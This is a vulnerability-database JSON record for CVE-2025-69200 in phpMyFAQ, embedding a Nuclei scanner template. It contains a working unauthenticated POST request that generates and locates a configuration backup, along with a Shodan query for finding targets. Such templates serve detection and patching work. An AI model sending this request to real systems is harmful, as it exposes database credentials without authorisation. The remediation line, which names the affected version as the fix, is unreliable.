{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-69200/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-69200/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-69200/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-69200/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-69200/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-69200"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-69200"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2025/CVE-2025-69200.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2025-69200\n\ninfo:\n  name: phpMyFAQ - Configuration Backup Disclosure\n  author: Louay-075\n  severity: high\n  description: |\n    phpMyFAQ <= 4.0.16 contains an information disclosure vulnerability caused by unauthenticated access to configuration backup ZIP generation and download, letting remote attackers access sensitive configuration files, exploit requires no authentication.\n  impact: |\n    Remote attackers can access sensitive configuration files, exposing database credentials and enabling further compromise.\n  remediation: |\n    Update to version 4.0.16 or later.\n  reference:\n    - https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9cg9-4h4f-j6fg\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69200\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-69200\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2025-69200\n    epss-score: 0.02173\n    epss-percentile: 0.8153\n    cwe-id: CWE-202\n  metadata:\n    verified: true\n    shodan-query: 'http.title:\"phpMyFAQ\"'\n    max-request: 1\n    product: phpmyfaq\n    vendor: phpmyfaq\n  tags: cve,cve2025,phpmyfaq,backup,exposure,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /api/setup/backup HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: text/plain\n\n        4.1.0-RC\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"backupFile\":\"'\n          - '.zip'\n        condition: and\n\n      - type: word\n        words:\n          - \"error\"\n          - \"forbidden\"\n        negative: true\n\n      - type: word\n        part: content_type\n        words:\n          - application/json\n\n    extractors:\n      - type: json\n        name: backup_url\n        json:\n          - '.backupFile'\n# digest: 4a0a0047304502204f5251e166630f6f6144007d8e7fe09bd1ee0259139734bc7d1cb9fbb76d94b9022100a8717cf55625d9a1681f5054822d8892afed356acf5ddc3d787d474e39399406:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2025-69200"
}